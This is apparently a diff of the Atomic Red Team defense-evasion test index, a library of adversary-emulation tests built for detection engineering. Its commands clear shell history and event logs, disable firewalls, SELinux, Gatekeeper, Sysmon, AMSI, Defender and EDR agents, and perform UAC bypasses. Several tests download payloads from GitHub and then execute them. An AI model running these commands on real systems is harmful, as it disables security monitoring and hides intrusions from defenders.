defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: 
@@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero -' + ' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions -' + ' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file -' + ' supported_platforms: - linux - macos 
@@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -' + ' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting -' + ' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname -' + ' cleanup_command: 'userdel -f testuser1 -' + ' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history -' + ' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing -' + ' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history -' + ' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath -' + ' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs -' + ' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} -' + ' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: 
@@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} -' + ' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. -' + ' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} -' + ' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1553.002: technique: external_references: 
@@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} -' + ' cleanup_command: 'del #{output_file} >nul 2>&1 -' + ' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} -' + ' executor: command: 'Invoke-Expression #{input_file} -' + ' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | gcc #{input_file} && ./a.out 
@@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. -' + ' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) -' + ' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} -' + ' executor: command: 'go run #{input_file} -' + ' name: bash T1218.001: technique: 
@@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) -' + ' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} -' + ' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} -' + ' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath 
@@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) -' + ' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} -' + ' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1578.003: 
@@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) -' + ' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present -' + ' prereq_command: 'which python3 -' + ' get_prereq_command: 'echo "Please install Python 3" -' + ' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present -' + ' prereq_command: 'which perl -' + ' get_prereq_command: 'echo "Please install Perl" -' + ' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console -' + ' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present -' + ' prereq_command: 'which xxd -' + ' get_prereq_command: 'echo "Please install xxd" -' + ' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail -' + ' supported_platforms: - iaas:aws input_arguments: 
@@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true -' + ' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false -' + ' cleanup_command: 'wevtutil sl "#{log_name}" /e:true -' + ' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off -' + ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 -' + ' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f -' + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 
@@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 -' + ' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw disable -' + ' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. -' + ' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'systemctl stop ufw -' + ' cleanup_command: | systemctl start ufw systemctl status ufw 
@@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'ufw logging off -' + ' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. -' + ' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules -' + ' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf 
@@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. -' + ' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. -' + ' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw -' + ' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. -' + ' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log -' + ' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection -' + ' supported_platforms: - linux input_arguments: 
@@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service -' + ' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement -' + ' supported_platforms: - linux executor: command: 'setenforce 0 -' + ' cleanup_command: 'setenforce 1 -' + ' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux -' + ' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response -' + ' supported_platforms: - macos executor: 
@@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist -' + ' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella -' + ' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist -' + ' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper -' + ' supported_platforms: - macos executor: command: 'sudo spctl --master-disable -' + ' cleanup_command: 'sudo spctl --master-enable -' + ' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS -' + ' supported_platforms: - macos input_arguments: 
@@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded -' + ' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed -' + ' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded -' + ' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} -' + ' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion -' + ' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available -' + ' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 